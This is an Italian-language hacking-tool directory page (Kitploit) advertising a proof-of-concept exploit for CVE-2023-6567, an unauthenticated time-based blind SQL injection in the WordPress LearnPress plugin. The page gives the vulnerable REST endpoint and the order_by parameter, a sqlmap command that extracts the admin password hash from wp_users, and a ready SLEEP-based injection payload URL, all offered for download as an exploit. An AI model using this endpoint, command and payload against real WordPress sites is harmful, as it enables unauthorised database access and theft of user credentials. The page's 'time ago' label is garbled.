Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-6567-poc — Proof-of-concept exploit per un'iniezione SQL cieca basata sul tempo nel plugin WordPress LearnPress, che consente a utenti non autenticati di estrarre dati sensibili tramite il parametro order_by. | Kitploit
Strumenti/GitHubGitHub/mimiloveexe/cve-2023-6567-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmimiloveexe/cve-2023-6567-poc

CVE-2023-6567-poc

Proof-of-concept exploit per un'iniezione SQL cieca basata sul tempo nel plugin WordPress LearnPress, che consente a utenti non autenticati di estrarre dati sensibili tramite il parametro order_by.

Vedi Repository
482 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-6567-poc

SQLi basata sul tempo

Descrizione Il plugin non sanifica e non esegue correttamente l'escape del parametro order_by prima di utilizzarlo in un'istruzione SQL, portando a un'iniezione SQL sfruttabile da utenti non autenticati

  1. Richiesta GET vulnerabile: https://vulnerablewordpress.com/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID&order=DESC&limit=10&return_type=html

  2. Salva la richiesta GET

  3. sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'

  4. sqlmap ha ripreso i seguenti punti di iniezione dalla sessione salvata:


Parametro: #1* (URI) Tipo: blind basato sul tempo Titolo: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html

Scarica lo strumento